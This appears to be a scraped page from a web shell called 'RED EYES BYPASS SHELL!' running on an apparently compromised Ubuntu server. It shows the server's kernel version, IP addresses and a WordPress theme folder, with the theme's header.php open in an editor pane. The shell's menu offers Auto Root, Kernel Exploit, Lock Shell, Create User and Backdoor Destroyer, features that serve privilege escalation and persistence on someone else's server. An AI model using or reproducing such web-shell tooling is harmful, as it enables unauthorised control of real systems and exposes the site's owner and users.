Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
QAtest /
wp-content /
themes /
marsh-blog /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
870
B
-rw-r--r--
archive.php
1.13
KB
-rw-r--r--
comments.php
3.19
KB
-rw-r--r--
footer.php
635
B
-rw-r--r--
front-page.php
336
B
-rw-r--r--
functions.php
10.51
KB
-rw-r--r--
header.php
1.22
KB
-rw-r--r--
index.php
1.31
KB
-rw-r--r--
page.php
910
B
-rw-r--r--
readme.txt
2.86
KB
-rw-r--r--
screenshot.png
224.56
KB
-rw-r--r--
search.php
1.01
KB
-rw-r--r--
searchform.php
768
B
-rw-r--r--
sidebar.php
513
B
-rw-r--r--
single.php
778
B
-rw-r--r--
style.css
78.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Marsh Blog */ /** * Hook - marsh_blog_action_doctype. * * @hooked marsh_blog_doctype - 10 */ do_action( 'marsh_blog_action_doctype' ); ?> <head> <?php /** * Hook - marsh_blog_action_head. * * @hooked marsh_blog_head - 10 */ do_action( 'marsh_blog_action_head' ); ?> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php do_action( 'wp_body_open' ); ?> <?php /** * Hook - marsh_blog_action_before. * * @hooked marsh_blog_page_start - 10 */ do_action( 'marsh_blog_action_before' ); /** * * @hooked marsh_blog_header_start - 10 */ do_action( 'marsh_blog_action_before_header' ); /** * *@hooked marsh_blog_site_branding - 10 *@hooked marsh_blog_header_end - 15 */ do_action('marsh_blog_action_header'); /** * * @hooked marsh_blog_content_start - 10 */ do_action( 'marsh_blog_action_before_content' ); /** * Banner start * * @hooked marsh_blog_banner_header - 10 */ do_action( 'marsh_blog_banner_header' );
Close